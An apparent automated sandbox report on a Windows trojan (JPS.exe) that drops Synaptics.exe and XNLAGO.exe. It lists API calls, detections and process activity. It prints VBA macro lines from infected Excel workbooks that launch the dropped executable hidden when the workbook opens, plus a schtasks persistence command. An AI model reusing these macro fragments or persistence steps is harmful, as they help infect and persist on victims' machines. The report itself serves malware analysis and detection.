                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_0079F5D0 NtdllDialogWndProc_W,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SetCapture,ClientToScreen,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                              System Summary

                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: J6UTCx7N.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: AFWAAFRXKO.xlsm.3.dr OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: J6UTCx7N.xlsm.3.dr Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: AFWAAFRXKO.xlsm.3.dr Stream path 'VBA/ThisWorkbook': found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: J6UTCx7N.xlsm.3.dr Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: AFWAAFRXKO.xlsm.3.dr Stream path 'VBA/ThisWorkbook': found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: J6UTCx7N.xlsm.3.dr Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: AFWAAFRXKO.xlsm.3.dr Stream path 'VBA/ThisWorkbook': found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}
                              Source: C:\Windows\SysWOW64\wscript.exe COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820}
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AD70AE: CreateFileW,DeviceIoControl,CloseHandle
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00ACB9F1 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,74D05590,CreateProcessAsUserW,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Code function: 2_2_00AD82D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe Code function: 10_2_007782D0 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: J6UTCx7N.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_Open()
                              Source: AFWAAFRXKO.xlsm.3.drOLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: String function: 00AB7750 appears 42 times
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: String function: 00AAF885 appears 68 times
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: String function: 00757750 appears 42 times
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: String function: 0074F885 appears 68 times
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 3432
                              Source: JPS.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: JPS.exeStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                              Source: Synaptics.exe.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX5246.tmp.0.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: ~$cache1.3.drStatic PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: JPS.exe, 00000000.00000003.1308288097.00000000023E0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameb! vs JPS.exe
                              Source: JPS.exe, 00000000.00000003.1308388322.00000000006C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs JPS.exe
                              Source: JPS.exe, 00000000.00000003.1308388322.00000000006C6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileNameQO"0 vs JPS.exe
                              Source: JPS.exe, 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileName vs JPS.exe
                              Source: JPS.exe, 00000000.00000003.1308538037.00000000006FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFileName vs JPS.exe
                              Source: JPS.exeBinary or memory string: OriginalFileName vs JPS.exe
                              Source: JPS.exeBinary or memory string: OriginalFilenameb! vs JPS.exe
                              Source: JPS.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: ._cache_JPS.exe.0.drStatic PE information: Section: UPX1 ZLIB complexity 0.988707228301187
                              Source: XNLAGO.exe.2.drStatic PE information: Section: UPX1 ZLIB complexity 0.988707228301187
                              Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@21/53@9/4
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADD712 GetLastError,FormatMessageW,2_2_00ADD712
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ACB8B0 AdjustTokenPrivileges,CloseHandle,2_2_00ACB8B0
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ACBEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,2_2_00ACBEC3
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0076B8B0 AdjustTokenPrivileges,CloseHandle,10_2_0076B8B0
                              Source: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exeCode function: 10_2_0076BEC3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_0076BEC3
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADEA85 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,2_2_00ADEA85
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00AD6F5B CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,2_2_00AD6F5B
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00ADEFCD CoInitialize,CoCreateInstance,CoUninitialize,2_2_00ADEFCD
                              Source: C:\Users\user\Desktop\._cache_JPS.exeCode function: 2_2_00A931F2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,2_2_00A931F2
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                              Source: C:\Users\user\Desktop\JPS.exeFile created: C:\Users\user\Desktop\._cache_JPS.exe
                              Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7716:120:WilError_03
                              Source: C:\ProgramData\Synaptics\Synaptics.exeMutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7604
                              Source: C:\Users\user\Desktop\._cache_JPS.exeFile created: C:\Users\user\AppData\Local\Temp\BQQQVU.vbs
                              Source: Yara matchFile source: JPS.exe, type: SAMPLE
                              Source: Yara matchFile source: 0.0.JPS.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara matchFile source: 00000000.00000000.1298292720.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\RCX5246.tmp, type: DROPPED
                              Source: Yara matchFile source: C:\Users\user\Documents\~$cache1, type: DROPPED
                              Source: Yara matchFile source: C:\ProgramData\Synaptics\Synaptics.exe, type: DROPPED
                              Source: C:\Users\user\Desktop\._cache_JPS.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs
                              Source: C:\Users\user\Desktop\JPS.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\ProgramData\Synaptics\Synaptics.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_JPS.exe'
                              Source: C:\Users\user\Desktop\JPS.exe File read: C:\Users\user\Desktop\desktop.ini
                              Source: C:\Users\user\Desktop\JPS.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                              Source: JPS.exe Virustotal: Detection: 85%
                              Source: JPS.exe ReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\JPS.exe File read: C:\Users\user\Desktop\JPS.exe
                              Source: unknown Process created: C:\Users\user\Desktop\JPS.exe "C:\Users\user\Desktop\JPS.exe"
                              Source: C:\Users\user\Desktop\JPS.exe Process created: C:\Users\user\Desktop\._cache_JPS.exe "C:\Users\user\Desktop\._cache_JPS.exe"
                              Source: C:\Users\user\Desktop\JPS.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\._cache_JPS.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\BQQQVU.vbs
                              Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn BQQQVU.exe /tr C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe /sc minute /mo 1
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                              Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7604 -s 3432
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe "C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe"
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                              Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe C:\Users\user\AppData\Roaming\Windata\XNLAGO.exe
                              Source: C:\Users\user\Desktop\JPS.exe Section loaded: apphelp.dll, version.dll, wininet.dll, wsock32.dll, netapi32.dll, uxtheme.dll, windows.storage.dll, wldp.dll, kernel.appcore.dll, textshaping.dll, propsys.dll, twext.dll, windows.staterepositoryps.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, policymanager.dll, msvcp110_win.dll, ntshrui.dll, sspicli.dll, windows.fileexplorer.common.dll, iertutil.dll, profapi.dll, srvcli.dll, cscapi.dll, netutils.dll, shacct.dll, twinapi.appcore.dll, idstore.dll, samlib.dll, starttiledata.dll, acppage.dll, sfc.dll, msi.dll, aepic.dll, sfc_os.dll, ntmarta.dll, cryptsp.dll, wlidprov.dll, samcli.dll, provsvc.dll, edputil.dll, urlmon.dll, wintypes.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
